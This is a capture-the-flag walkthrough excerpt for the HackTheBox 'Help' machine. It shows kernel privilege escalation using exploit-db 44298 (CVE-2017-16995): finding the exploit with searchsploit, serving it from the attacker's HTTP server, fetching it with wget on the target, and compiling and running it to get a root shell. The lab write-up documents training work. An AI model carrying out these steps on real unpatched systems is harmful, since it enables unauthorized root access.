help@help:~$ uname -a Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
Kernel 4.4.0-116 (Ubuntu 16.04.4) has a known local privilege escalation, exploit-db 44298 (CVE-2017-16995, a sign-extension bug in the eBPF verifier). The exploit's own comments say it was tested on exactly this build and that the CRED offset must be adjusted for any other kernel, so the uname output matching the tested string is what makes it safe to run as-is.

u505@kali:~/HTB/Machines/Help$ searchsploit 4.4.0-116
---------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                  |  Path
                                                                | (/usr/share/exploitdb/)
---------------------------------------------------------------- ----------------------------------------
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Esc | exploits/linux/local/44298.c
---------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
u505@kali:~/HTB/Machines/Help$ cd www/
u505@kali:~/HTB/Machines/Help/www$ searchsploit -m 44298
  Exploit: Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/44298
     Path: /usr/share/exploitdb/exploits/linux/local/44298.c
File Type: C source, ASCII text, with CRLF line terminators

Copied to: /home/u505/HTB/Machines/Help/www/44298.c
u505@kali:~/HTB/Machines/Help/www$ head 44298.c
/*
 * Ubuntu 16.04.4 kernel priv esc
 *
 * all credits to @bleidl
 * - vnik
 */

// Tested on:
// 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64
// if different kernel adjust CRED offset + check kernel stack size
u505@kali:~/HTB/Machines/Help/www$ sudo python -m SimpleHTTPServer 80
[sudo] password for u505: 
Serving HTTP on 0.0.0.0 port 80 ...

From the target, fetch, compile and run it:

help@help:~$ wget -q http://10.10.14.26/44298.c
help@help:~$ gcc 44298.c -o 44298
help@help:~$ ./44298
task_struct = ffff880036795400
uidptr = ffff88003684c844
spawning root shell
root@help:~# whoami
root
root@help:~# cat /root/root.txt
<ROOT_FLAG>
Daniel Simao 19:03, 17 February 2020 (EST)